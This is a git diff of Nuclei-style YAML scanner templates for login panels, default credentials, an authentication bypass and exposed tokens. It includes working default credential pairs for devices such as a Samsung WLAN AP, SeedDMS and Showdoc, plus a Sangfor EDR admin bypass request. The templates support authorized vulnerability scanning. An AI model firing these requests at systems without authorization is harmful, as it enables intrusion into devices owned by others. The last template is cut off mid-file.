4b0a00483046022100838bcb94cc1d2453c6ee0bf1b36cb8d64ef3bb04caa56bf123afdb615938472f022100b5609ff3b9052d9a9263a8c2abc1b4fee0f8827a076287a2a94f05987a626b87:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/samsung-wlan-default-login-10018.yaml b/poc/auth/samsung-wlan-default-login-10018.yaml new file mode 100644 index 0000000000..fcb7300e4c --- /dev/null +++ b/poc/auth/samsung-wlan-default-login-10018.yaml @@ -0,0 +1,45 @@ +id: samsung-wlan-default-login + +info: + name: Samsung Wlan AP (WEA453e) Default Login + author: pikpikcu + severity: high + description: Samsung Wlan AP (WEA453e) default root credentials were discovered. + reference: + - https://securityforeveryone.com/tools/samsung-wlan-ap-wea453e-default-credentials-scanner + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + metadata: + max-request: 1 + tags: samsung,default-login + +http: + - raw: + - | + POST /main.ehp HTTP/1.1 + Host: {{Hostname}} + + httpd;General;lang=en&login_id={{username}}&login_pw={{password}} + + payloads: + username: + - root + password: + - sweap12~ + attack: pitchfork + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "document.formParent2.changepasswd1.value" + - "passwd_change.ehp" + + - type: status + status: + - 200 + +# digest: 490a0046304402204c0c004f4e1523701e478e97dea5095b387b9e48975efa867a71d9ec5012c9c802203dda76ffd89c7ddec72b0bf0621c90196db5ea0b214d890ef7dbd4c7fbbbc3e0:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/sangfor-edr-auth-bypass-10022.yaml b/poc/auth/sangfor-edr-auth-bypass-10022.yaml index 313272d6d7..19a68c8b9d 100644 --- a/poc/auth/sangfor-edr-auth-bypass-10022.yaml +++ b/poc/auth/sangfor-edr-auth-bypass-10022.yaml @@ -1,30 +1,45 @@ id: sangfor-edr-auth-bypass + info: - name: Sangfor EDR Authentication Bypass + name: Sangfor EDR - Authentication Bypass author: princechaddha severity: high - description: A vulnerability in Sangfor EDR allows remote attackers to access the system with 'admin' privileges by accessing the login page directly using a provided username rather than going through the login screen without providing a username. + description: | + Sangfor EDR contains an authentication bypass vulnerability. An attacker can access the system with admin privileges by accessing the login page directly using a provided username rather than going through the login screen without providing a username. This makes it possible to obtain sensitive information, modify data, and/or execute unauthorized operations. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.1 + cwe-id: CWE-287 + metadata: + max-request: 1 + fofa-query: app="sangfor" tags: sangfor,auth-bypass,login -requests: +http: - method: GET path: - "{{BaseURL}}/ui/login.php?user=admin" + matchers-condition: and matchers: - - type: status - status: - - 302 - type: word + part: body words: - "/download/edr_installer_" - part: body + - type: word + part: header words: - 'Set-Cookie=""' - part: header negative: true + - type: word + part: header words: - 'Set-Cookie=' - part: header + + - type: status + status: + - 302 + +# digest: 4a0a00473045022100b44fc80ed7fea92dcae3fa2c531204b2b0c157e3c31c62b264451a38c8aae83302206a40cc30c18dcbf7c19316b5798b7ccdf4953a2ddad03b78a16ed2ca37ecc91d:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/sangfor-edr-auth-bypass.yaml b/poc/auth/sangfor-edr-auth-bypass.yaml deleted file mode 100644 index 703d52dce3..0000000000 --- a/poc/auth/sangfor-edr-auth-bypass.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: sangfor-edr-auth-bypass -info: - name: Sangfor EDR Authentication Bypass - author: princechaddha - severity: high - description: A vulnerability in Sangfor EDR allows remote attackers to access the system with 'admin' privileges by accessing the login page directly using a provided username rather than going through the login screen without providing a username. - tags: sangfor,auth-bypass,login -requests: - - method: GET - path: - - "{{BaseURL}}/ui/login.php?user=admin" - matchers-condition: and - matchers: - - type: status - status: - - 302 - - type: word - words: - - "/download/edr_installer_" - part: body - - type: word - words: - - 'Set-Cookie=""' - part: header - negative: true - - type: word - words: - - 'Set-Cookie=' - part: header diff --git a/poc/auth/sauter-login-10089.yaml b/poc/auth/sauter-login-10091.yaml similarity index 100% rename from poc/auth/sauter-login-10089.yaml rename to poc/auth/sauter-login-10091.yaml diff --git a/poc/auth/sauter-login.yaml b/poc/auth/sauter-login.yaml index 5a6965d3ce..052a5a3773 100644 --- a/poc/auth/sauter-login.yaml +++ b/poc/auth/sauter-login.yaml @@ -1,34 +1,20 @@ id: sauter-login - info: - name: Sauter moduWeb Login Panel - Detect + name: Sauter moduWeb - Login author: DhiyaneshDk severity: info - description: Sauter moduWeb login panel was detected. - reference: - - https://www.exploit-db.com/ghdb/6883 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 - cwe-id: CWE-200 - metadata: - max-request: 1 - tags: panel,sauter,edb - -http: + reference: https://www.exploit-db.com/ghdb/6883 + tags: panel,sauter +requests: - method: GET path: - "{{BaseURL}}/?locale=en" - matchers-condition: and matchers: - type: word words: - Sauter moduWeb - Login part: body - - type: status status: - 200 - -# digest: 4a0a00473045022100a291bb674f27b7dc3071d42f57e98b34ab61994c2c902c4080cf61840d87e7c90220475ee58e61aa160ed91bb945d2f2eff4cd1d18a7120614e4692f872f2fda98b2:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/seats-login-10104.yaml b/poc/auth/seats-login-10104.yaml deleted file mode 100644 index 735d33c6f9..0000000000 --- a/poc/auth/seats-login-10104.yaml +++ /dev/null @@ -1,19 +0,0 @@ -id: seats-login -info: - name: Seats login - author: dhiyaneshDK - severity: info - reference: https://www.shodan.io/search?query=http.title%3A%22seats.io++%7C+login%22 - tags: panel -requests: - - method: GET - path: - - '{{BaseURL}}/login' - matchers-condition: and - matchers: - - type: word - words: - - "seats.io | login" - - type: status - status: - - 200 diff --git a/poc/auth/seats-login.yaml b/poc/auth/seats-login.yaml index 7844b8872d..735d33c6f9 100644 --- a/poc/auth/seats-login.yaml +++ b/poc/auth/seats-login.yaml @@ -3,8 +3,7 @@ info: name: Seats login author: dhiyaneshDK severity: info - reference: - - https://www.shodan.io/search?query=http.title%3A%22seats.io++%7C+login%22 + reference: https://www.shodan.io/search?query=http.title%3A%22seats.io++%7C+login%22 tags: panel requests: - method: GET diff --git a/poc/auth/seeddms-default-login-10125.yaml b/poc/auth/seeddms-default-login-10125.yaml index a0824cca35..695086cbe2 100644 --- a/poc/auth/seeddms-default-login-10125.yaml +++ b/poc/auth/seeddms-default-login-10125.yaml @@ -1,18 +1,10 @@ id: seeddms-default-login info: - name: SeedDMS Default Login + name: SeedDMS Default Credential author: alifathi-h1 severity: high - description: SeedDMS default admin credentials were discovered. - reference: - - https://www.seeddms.org/index.php?id=2 - - https://www.redhat.com/sysadmin/install-seeddms - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cve-id: - cwe-id: CWE-522 + reference: https://www.redhat.com/sysadmin/install-seeddms tags: default-login,seeddms requests: @@ -40,6 +32,4 @@ requests: - type: status status: - - 302 - -# Enhanced by mp on 2022/03/11 + - 302 \ No newline at end of file diff --git a/poc/auth/seeddms-default-login-10127.yaml b/poc/auth/seeddms-default-login-10127.yaml index 695086cbe2..ed3e30f3db 100644 --- a/poc/auth/seeddms-default-login-10127.yaml +++ b/poc/auth/seeddms-default-login-10127.yaml @@ -1,12 +1,17 @@ id: seeddms-default-login - info: - name: SeedDMS Default Credential + name: SeedDMS Default Login author: alifathi-h1 severity: high - reference: https://www.redhat.com/sysadmin/install-seeddms + description: SeedDMS default admin credentials were discovered. + reference: + - https://www.seeddms.org/index.php?id=2 + - https://www.redhat.com/sysadmin/install-seeddms + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 tags: default-login,seeddms - requests: - raw: - | @@ -15,13 +20,11 @@ requests: Content-Type: application/x-www-form-urlencoded; charset=UTF-8 login={{username}}&pwd={{password}}&lang= - payloads: username: - admin password: - admin - attack: pitchfork matchers-condition: and matchers: @@ -29,7 +32,8 @@ requests: part: header words: - 'Location: /out/out.ViewFolder.php' - - type: status status: - - 302 \ No newline at end of file + - 302 + +# Enhanced by mp on 2022/03/11 diff --git a/poc/auth/sendgrid-api-key-10140.yaml b/poc/auth/sendgrid-api-key-10140.yaml index 88f920b11b..76506d7b27 100644 --- a/poc/auth/sendgrid-api-key-10140.yaml +++ b/poc/auth/sendgrid-api-key-10140.yaml @@ -3,7 +3,7 @@ info: name: Sendgrid API Key Disclosure author: Ice3man severity: info - tags: exposure,token + tags: exposure,token,sendgrid requests: - method: GET path: diff --git a/poc/auth/sequoiadb-default-login-10150.yaml b/poc/auth/sequoiadb-default-login-10150.yaml index f7d7a2ef0b..39348896d3 100644 --- a/poc/auth/sequoiadb-default-login-10150.yaml +++ b/poc/auth/sequoiadb-default-login-10150.yaml @@ -1,19 +1,10 @@ id: sequoiadb-default-login - info: name: SequoiaDB Default Login author: dhiyaneshDk severity: high - description: SequoiaDB default admin credentials were discovered. + description: Searches for default admin credentials for the SequoiaDB application. tags: default-login,sequoiadb - reference: - - https://www.sequoiadb.com/en/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cve-id: - cwe-id: CWE-522 - requests: - raw: - | @@ -26,27 +17,21 @@ requests: SdbLanguage: en cmd=login&user={{username}}&passwd={{md5(password)}} - payloads: username: - admin password: - admin attack: pitchfork - matchers-condition: and matchers: - type: status status: - 200 - - type: dsl dsl: - contains(tolower(all_headers), 'sdbsessionid') - - type: word part: body words: - '{ "errno": 0 }' - -# Enhanced by mp on 2022/03/11 diff --git a/poc/auth/server-backup-login-10153.yaml b/poc/auth/server-backup-login-10153.yaml new file mode 100644 index 0000000000..0639ab5356 --- /dev/null +++ b/poc/auth/server-backup-login-10153.yaml @@ -0,0 +1,19 @@ +id: server-backup-login +info: + name: Server Backup Manager SE Login + author: dhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/6949 + tags: panel +requests: + - method: GET + path: + - '{{BaseURL}}/login.zul' + matchers-condition: and + matchers: + - type: word + words: + - 'Idera Server Backup Manager SE ' + - type: status + status: + - 200 diff --git a/poc/auth/server-backup-login-10156.yaml b/poc/auth/server-backup-login-10156.yaml deleted file mode 100644 index 4089d46390..0000000000 --- a/poc/auth/server-backup-login-10156.yaml +++ /dev/null @@ -1,20 +0,0 @@ -id: server-backup-login -info: - name: Server Backup Manager SE Login - author: dhiyaneshDKi,pathtaga - severity: info - reference: - - https://www.exploit-db.com/ghdb/6949 - tags: paneil,idera -requests: - - method: GET - path: - - '{{BaseURL}}/login.zul' - matchers-condition: and - matchers: - - type: word - words: - - 'Idera Server Backup Manager SE ' - - type: status - status: - - 200 diff --git a/poc/auth/server-backup-login.yaml b/poc/auth/server-backup-login.yaml index 0639ab5356..91b0a05ace 100644 --- a/poc/auth/server-backup-login.yaml +++ b/poc/auth/server-backup-login.yaml @@ -1,19 +1,33 @@ id: server-backup-login + info: - name: Server Backup Manager SE Login - author: dhiyaneshDK + name: Server Backup Manager SE Login Panel - Detect + author: dhiyaneshDKi,pathtaga severity: info - reference: https://www.exploit-db.com/ghdb/6949 - tags: panel -requests: + description: Server Backup Manager SE login panel was detected. + reference: + - https://www.exploit-db.com/ghdb/6949 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 + metadata: + max-request: 1 + tags: paneil,idera,edb + +http: - method: GET path: - '{{BaseURL}}/login.zul' + matchers-condition: and matchers: - type: word words: - 'Idera Server Backup Manager SE ' + - type: status status: - 200 + +# digest: 4b0a0048304602210090abc9072a7291db264bd80b54c29efa2d20c83fa01a7010c87a84f97737417c02210089f946777a501eb1cb19bd09e3986cd67136b5806b261332c839db98947067cd:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/server-backup-manager-se-login-detect.yaml b/poc/auth/server-backup-manager-se-login-detect.yaml index 94e05a332f..9e8e641acf 100644 --- a/poc/auth/server-backup-manager-se-login-detect.yaml +++ b/poc/auth/server-backup-manager-se-login-detect.yaml @@ -1,20 +1,33 @@ id: server-backup-manager-se + info: - name: Server Backup Manager SE + name: Server Backup Manager SE Panel - Detect author: dhiyaneshDK severity: info + description: Server Backup Manager SE login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: + max-request: 1 shodan-query: http.title:"Server Backup Manager SE" - tags: panel -requests: + tags: panel,server,backup,manager + +http: - method: GET path: - '{{BaseURL}}/login.zul' + matchers-condition: and matchers: - - type: word - words: - - 'Server Backup Manager SE ' + - type: regex + part: body + regex: + - ".*(Server Backup Manager SE).*" + - type: status status: - 200 + +# Enhanced by md on 2023/01/16 diff --git a/poc/auth/service-pwd.yaml b/poc/auth/service-pwd-10176.yaml similarity index 100% rename from poc/auth/service-pwd.yaml rename to poc/auth/service-pwd-10176.yaml diff --git a/poc/auth/service-pwd-10178.yaml b/poc/auth/service-pwd-10178.yaml index 6382f9de19..d9ee216153 100644 --- a/poc/auth/service-pwd-10178.yaml +++ b/poc/auth/service-pwd-10178.yaml @@ -1,22 +1,30 @@ id: service-pwd + info: - name: Service password file + name: service.pwd - Sensitive Information Disclosure author: pussycat0x severity: high - description: Searches for sensitive service.pwd file. + description: service.pwd was discovered, which is likely to contain sensitive information. reference: - https://www.exploit-db.com/ghdb/7256 - tags: exposure,listing,service -requests: + metadata: + max-request: 1 + tags: exposure,listing,service,edb,misconfig + +http: - method: GET path: - "{{BaseURL}}/_vti_pvt/service.pwd" + matchers-condition: and matchers: - type: word words: - "# -FrontPage-" part: body + - type: status status: - 200 + +# digest: 490a00463044022032a929cfbf0c91c6e0fac77b275d5bf75705734a1cbd4ab0e274a740a3e2784502201502fc164696775ff97ad8cc4589ac3fe0375d4bb8bd508b9904f9ff55896707:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/servicedesk-login-panel-10172.yaml b/poc/auth/servicedesk-login-panel-10172.yaml deleted file mode 100644 index 230750434b..0000000000 --- a/poc/auth/servicedesk-login-panel-10172.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: servicedesk-login-panel -info: - name: Servicedesk Login Panel Detector - author: aashiq - severity: info - description: Searches for ServiceDesk login panels by trying to query the "/servicedesk/customer/user/login" endpoint - metadata: - shodan-query: http.component:"Atlassian Confluence" - tags: servicedesk,confluence,jira,panel,login -requests: - - method: GET - path: - - "{{BaseURL}}/servicedesk/customer/user/login" - - "{{BaseURL}}/servicedesk/customer/portal/10/user/login" - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - "https://confluence.atlassian.com" diff --git a/poc/auth/servicedesk-login-panel.yaml b/poc/auth/servicedesk-login-panel.yaml index 5d949bca29..1b7c1dce37 100644 --- a/poc/auth/servicedesk-login-panel.yaml +++ b/poc/auth/servicedesk-login-panel.yaml @@ -1,13 +1,20 @@ id: servicedesk-login-panel info: - name: Servicedesk Login Panel Detector + name: Jira Service Desk Login Panel - Detect author: aashiq severity: info - description: Searches for ServiceDesk login panels by trying to query the "/servicedesk/customer/user/login" endpoint + description: Jira Service Desk login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 + metadata: + max-request: 2 + shodan-query: http.component:"Atlassian Confluence" tags: servicedesk,confluence,jira,panel,login -requests: +http: - method: GET path: - "{{BaseURL}}/servicedesk/customer/user/login" @@ -22,3 +29,5 @@ requests: - type: word words: - "https://confluence.atlassian.com" + +# digest: 490a00463044022077309d33c3c113cdb8a92e187746ddff7b699f76668aa80262824496770b3adf022014618995cb77b35cbffe918e1bab542dbc73cebae78bdad610073ae5593c9b8e:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/sgp-login-panel-10182.yaml b/poc/auth/sgp-login-panel-10182.yaml index 8d70bb2b08..9ad3f1038a 100644 --- a/poc/auth/sgp-login-panel-10182.yaml +++ b/poc/auth/sgp-login-panel-10182.yaml @@ -3,8 +3,7 @@ info: name: SGP Panel author: dhiyaneshDK severity: info - reference: - - https://www.shodan.io/search?query=http.title%3A%22SGP%22 + reference: https://www.shodan.io/search?query=http.title%3A%22SGP%22 tags: panel,sgp requests: - method: GET diff --git a/poc/auth/sgp-login-panel.yaml b/poc/auth/sgp-login-panel.yaml index 71d37d0284..8d70bb2b08 100644 --- a/poc/auth/sgp-login-panel.yaml +++ b/poc/auth/sgp-login-panel.yaml @@ -1,39 +1,26 @@ id: sgp-login-panel - info: - name: SGP Login Panel - Detect + name: SGP Panel author: dhiyaneshDK severity: info - description: SGP login panel was detected. - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 - cwe-id: CWE-200 - metadata: - max-request: 1 - shodan-query: http.title:"SGP" + reference: + - https://www.shodan.io/search?query=http.title%3A%22SGP%22 tags: panel,sgp - -http: +requests: - method: GET path: - '{{BaseURL}}/accounts/login?next=/admin/' - matchers-condition: and matchers: - type: word words: - 'SGP' - - type: status status: - 200 - extractors: - type: regex part: body group: 1 regex: - ">Ver\\. ([0-9.A-Z]+)

" - -# digest: 4a0a0047304502203630d7e1217349d91aab73fb36c6102fe21d289d4a0ba7b32005342b8141d717022100dbfb88de5c9f9949f5b3f59918a2ccf9b85cf24946a0f6e2b47a62601eb5b6aa:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/sharecenter-login-10190.yaml b/poc/auth/sharecenter-login-10190.yaml index 929f60a7e4..ca2c625381 100644 --- a/poc/auth/sharecenter-login-10190.yaml +++ b/poc/auth/sharecenter-login-10190.yaml @@ -4,6 +4,7 @@ info: author: dhiyaneshDk severity: info reference: https://www.exploit-db.com/ghdb/6892 + tags: panel,login requests: - method: GET path: diff --git a/poc/auth/shopify-custom-token(1).yaml b/poc/auth/shopify-custom-token(1).yaml new file mode 100644 index 0000000000..fbdd23d61d --- /dev/null +++ b/poc/auth/shopify-custom-token(1).yaml @@ -0,0 +1,16 @@ +id: shopify-custom-token + +info: + name: Shopify Custom App Access Token + author: gaurang + severity: high + tags: token,file + +file: + - extensions: + - all + + extractors: + - type: regex + regex: + - "shpca_[a-fA-F0-9]{32}" \ No newline at end of file diff --git a/poc/auth/shopify-custom-token-10198.yaml b/poc/auth/shopify-custom-token-10198.yaml deleted file mode 100644 index b4ef9d4c53..0000000000 --- a/poc/auth/shopify-custom-token-10198.yaml +++ /dev/null @@ -1,13 +0,0 @@ -id: shopify-custom-token -info: - name: Shopify Custom App Access Token - author: gaurang - severity: high - tags: token,file -file: - - extensions: - - all - extractors: - - type: regex - regex: - - "shpca_[a-fA-F0-9]{32}" diff --git a/poc/auth/shopify-custom-token-11860.yaml b/poc/auth/shopify-custom-token-11860.yaml index fbdd23d61d..b4ef9d4c53 100644 --- a/poc/auth/shopify-custom-token-11860.yaml +++ b/poc/auth/shopify-custom-token-11860.yaml @@ -1,16 +1,13 @@ id: shopify-custom-token - info: name: Shopify Custom App Access Token author: gaurang severity: high tags: token,file - file: - extensions: - all - extractors: - type: regex regex: - - "shpca_[a-fA-F0-9]{32}" \ No newline at end of file + - "shpca_[a-fA-F0-9]{32}" diff --git a/poc/auth/shopify-private-token-11861.yaml b/poc/auth/shopify-private-token-11861.yaml deleted file mode 100644 index 7e308d71f9..0000000000 --- a/poc/auth/shopify-private-token-11861.yaml +++ /dev/null @@ -1,16 +0,0 @@ -id: shopify-private-token - -info: - name: Shopify Private App Access Token - author: gaurang - severity: high - tags: token,file - -file: - - extensions: - - all - - extractors: - - type: regex - regex: - - "shppa_[a-fA-F0-9]{32}" \ No newline at end of file diff --git a/poc/auth/shopify-private-token.yaml b/poc/auth/shopify-private-token.yaml index bd7661b886..7e308d71f9 100644 --- a/poc/auth/shopify-private-token.yaml +++ b/poc/auth/shopify-private-token.yaml @@ -5,6 +5,7 @@ info: author: gaurang severity: high tags: token,file + file: - extensions: - all @@ -12,6 +13,4 @@ file: extractors: - type: regex regex: - - "shppa_[a-fA-F0-9]{32}" - -# digest: 4a0a00473045022100a9be020541f7a37dd6e6656f9b67a9b0442ea70165319513ba08e1634e671f9402204d204366be0afb3f9811dcfefced9824ae43e1c1a4aec775fc11f0a6a97ecc86:922c64590222798bb761d5b6d8e72950 + - "shppa_[a-fA-F0-9]{32}" \ No newline at end of file diff --git a/poc/auth/shoppable-token-10206.yaml b/poc/auth/shoppable-token-10206.yaml index 7f46fae563..12883090dd 100644 --- a/poc/auth/shoppable-token-10206.yaml +++ b/poc/auth/shoppable-token-10206.yaml @@ -1,14 +1,17 @@ id: shoppable-token + info: name: Shoppable Service Auth Token author: philippedelteil - severity: info + severity: unknown reference: https://ask.shoppable.com/knowledge/quick-start-api-guide tags: exposure,shoppable,token,auth,service + requests: - method: GET path: - "{{BaseURL}}" + matchers: - type: word part: body diff --git a/poc/auth/shoppable-token-10209.yaml b/poc/auth/shoppable-token-10209.yaml new file mode 100644 index 0000000000..7f46fae563 --- /dev/null +++ b/poc/auth/shoppable-token-10209.yaml @@ -0,0 +1,16 @@ +id: shoppable-token +info: + name: Shoppable Service Auth Token + author: philippedelteil + severity: info + reference: https://ask.shoppable.com/knowledge/quick-start-api-guide + tags: exposure,shoppable,token,auth,service +requests: + - method: GET + path: + - "{{BaseURL}}" + matchers: + - type: word + part: body + words: + - data-shoppable-auth-token diff --git a/poc/auth/shoppable-token.yaml b/poc/auth/shoppable-token.yaml new file mode 100644 index 0000000000..71cd3fb638 --- /dev/null +++ b/poc/auth/shoppable-token.yaml @@ -0,0 +1,16 @@ +id: shoppable-token +info: + name: Shoppable Service Auth Token + author: philippedelteil + severity: unknown + reference: https://ask.shoppable.com/knowledge/quick-start-api-guide + tags: exposure,shoppable,token,auth,service +requests: + - method: GET + path: + - "{{BaseURL}}" + matchers: + - type: word + part: body + words: + - data-shoppable-auth-token diff --git a/poc/auth/showdoc-default-login-10221.yaml b/poc/auth/showdoc-default-login-10221.yaml index 4bf519de51..70a3336a98 100644 --- a/poc/auth/showdoc-default-login-10221.yaml +++ b/poc/auth/showdoc-default-login-10221.yaml @@ -1,4 +1,5 @@ id: showdoc-default-login + info: name: Showdoc Default Login author: pikpikcu @@ -6,13 +7,15 @@ info: description: Showdoc default credentials were discovered. reference: - https://blog.star7th.com/2016/05/2007.html - tags: showdoc,default-login classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N cvss-score: 5.8 - cve-id: cwe-id: CWE-522 -requests: + metadata: + max-request: 1 + tags: showdoc,default-login + +http: - raw: - | POST /server/index.php?s=/api/user/login HTTP/1.1 @@ -20,12 +23,14 @@ requests: Content-Type: application/x-www-form-urlencoded;charset=UTF-8 username={{username}}&password={{password}}&v_code= + payloads: username: - showdoc password: - 123456 attack: pitchfork + matchers-condition: and matchers: - type: word @@ -33,8 +38,9 @@ requests: - '"username":"showdoc"' - '"user_token":' condition: and + - type: status status: - 200 -# Enhanced by mp on 2022/03/11 +# digest: 4a0a00473045022035dad9ddfbf0e6fb91a80fca9878b313092374a601129f7792f172131a26c99d022100febc0eab2e695a86e0b0af34718b652daa0913d81e3516918c8a249e1bebffcc:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/sitefinity-login-10298.yaml b/poc/auth/sitefinity-login-10297.yaml similarity index 100% rename from poc/auth/sitefinity-login-10298.yaml rename to poc/auth/sitefinity-login-10297.yaml diff --git a/poc/auth/sitefinity-login.yaml b/poc/auth/sitefinity-login.yaml index 0d146256b9..441e824eda 100644 --- a/poc/auth/sitefinity-login.yaml +++ b/poc/auth/sitefinity-login.yaml @@ -1,4 +1,5 @@ id: sitefinity-login + info: name: Sitefinity Login author: dhiyaneshDK @@ -6,18 +7,23 @@ info: description: This template identifies the Sitefinity login page. reference: - https://www.exploit-db.com/ghdb/6722 - tags: panel,sitefinity -requests: + metadata: + max-request: 1 + tags: sitefinity,edb,panel + +http: - method: GET path: - '{{BaseURL}}/Sitefinity/Authenticate/SWT' + matchers-condition: and matchers: - type: word words: - 'Telerik.Sitefinity.Web.UI.UserPreferences' + - type: status status: - 200 -# Enhanced by cs on 2022/02/28 +# digest: 4b0a00483046022100abaac7dde301e7bfbf2c555fdc011dac48f4f07f3f1f9b47bf5353203bd09ad9022100bb9a0ca31438b251f1241420c8c01590ae7fd0dd1fd66a4582aaf834dff972d2:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/siteomat-login-10300.yaml b/poc/auth/siteomat-login-10300.yaml deleted file mode 100644 index e24172c9a5..0000000000 --- a/poc/auth/siteomat-login-10300.yaml +++ /dev/null @@ -1,19 +0,0 @@ -id: siteomat-loader -info: - name: Orpak SiteOmat login portals - author: dhiyaneshDK - severity: info - reference: https://www.exploit-db.com/ghdb/6624 - tags: panel -requests: - - method: GET - path: - - '{{BaseURL}}/login.htm' - matchers-condition: and - matchers: - - type: word - words: - - 'SiteOmat Login' - - type: status - status: - - 200 diff --git a/poc/auth/siteomat-login-10301.yaml b/poc/auth/siteomat-login-10301.yaml new file mode 100644 index 0000000000..20854f2b8d --- /dev/null +++ b/poc/auth/siteomat-login-10301.yaml @@ -0,0 +1,19 @@ +id: siteomat-loader +info: + name: Orpak SiteOmat login portals + author: dhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/6624 + tags: panel,siteomat,login +requests: + - method: GET + path: + - '{{BaseURL}}/login.htm' + matchers-condition: and + matchers: + - type: word + words: + - 'SiteOmat Login' + - type: status + status: + - 200 diff --git a/poc/auth/siteomat-login-10303.yaml b/poc/auth/siteomat-login-10303.yaml index 20854f2b8d..de5e63a8ba 100644 --- a/poc/auth/siteomat-login-10303.yaml +++ b/poc/auth/siteomat-login-10303.yaml @@ -3,7 +3,8 @@ info: name: Orpak SiteOmat login portals author: dhiyaneshDK severity: info - reference: https://www.exploit-db.com/ghdb/6624 + reference: + - https://www.exploit-db.com/ghdb/6624 tags: panel,siteomat,login requests: - method: GET diff --git a/poc/auth/slack-bot-token-10310.yaml b/poc/auth/slack-bot-token-10310.yaml index e520d806c8..8e76c2814d 100644 --- a/poc/auth/slack-bot-token-10310.yaml +++ b/poc/auth/slack-bot-token-10310.yaml @@ -1,18 +1,15 @@ id: slack-bot-token - info: name: Slack access token author: nadino severity: info tags: exposure,token,slack - requests: - method: GET path: - "{{BaseURL}}" - extractors: - type: regex part: body regex: - - "xoxb-[0-9A-Za-z\\-]{51}" \ No newline at end of file + - "xoxb-[0-9A-Za-z\\-]{51}" diff --git a/poc/auth/slack-bot-token-10312.yaml b/poc/auth/slack-bot-token-10312.yaml new file mode 100644 index 0000000000..e520d806c8 --- /dev/null +++ b/poc/auth/slack-bot-token-10312.yaml @@ -0,0 +1,18 @@ +id: slack-bot-token + +info: + name: Slack access token + author: nadino + severity: info + tags: exposure,token,slack + +requests: + - method: GET + path: + - "{{BaseURL}}" + + extractors: + - type: regex + part: body + regex: + - "xoxb-[0-9A-Za-z\\-]{51}" \ No newline at end of file diff --git a/poc/auth/slocum-login-10317.yaml b/poc/auth/slocum-login-10317.yaml index b5ffdacd1e..118932715d 100644 --- a/poc/auth/slocum-login-10317.yaml +++ b/poc/auth/slocum-login-10317.yaml @@ -1,18 +1,22 @@ id: slocum-login + info: name: Slocum Fleet Mission Control Login author: pussycat0x severity: info tags: panel,tech,slocum + requests: - method: GET path: - "{{BaseURL}}/sfmc/login" + matchers-condition: and matchers: - type: word words: - "Slocum Fleet Mission Control - Login" + - type: status status: - 200 diff --git a/poc/auth/slocum-login.yaml b/poc/auth/slocum-login.yaml index 108ce5cc24..b5ffdacd1e 100644 --- a/poc/auth/slocum-login.yaml +++ b/poc/auth/slocum-login.yaml @@ -1,31 +1,18 @@ id: slocum-login - info: - name: Slocum Fleet Mission Control Login Panel - Detect + name: Slocum Fleet Mission Control Login author: pussycat0x severity: info - description: Slocum Fleet Mission Control login panel was detected. - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 - cwe-id: CWE-200 - metadata: - max-request: 1 tags: panel,tech,slocum - -http: +requests: - method: GET path: - "{{BaseURL}}/sfmc/login" - matchers-condition: and matchers: - type: word words: - "Slocum Fleet Mission Control - Login" - - type: status status: - 200 - -# digest: 4a0a00473045022100d4e6d5f058359a5d8b637a79a5ac3fba6066e07f6971c60ed482705b22cdb0fb02203cfc99e10ca906964c7533d1d0aaec6982103e16e14207147c2ab5a159d07010:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/smartsense-default-login-10330.yaml b/poc/auth/smartsense-default-login-10330.yaml index b4af83b266..accfe10352 100644 --- a/poc/auth/smartsense-default-login-10330.yaml +++ b/poc/auth/smartsense-default-login-10330.yaml @@ -1,4 +1,5 @@ id: smartsense-default-login + info: name: HortonWorks SmartSense Default Login author: Techryptic (@Tech) @@ -10,30 +11,37 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 + metadata: + max-request: 1 tags: hortonworks,smartsense,default-login -requests: + +http: - raw: - | GET /apt/v1/context HTTP/1.1 Host: {{Hostname}} Authorization: Basic {{base64(username + ':' + password)}} + payloads: username: - admin password: - admin attack: pitchfork + matchers-condition: and matchers: - type: word words: - "Set-Cookie: SUPPORTSESSIONID" part: header + - type: 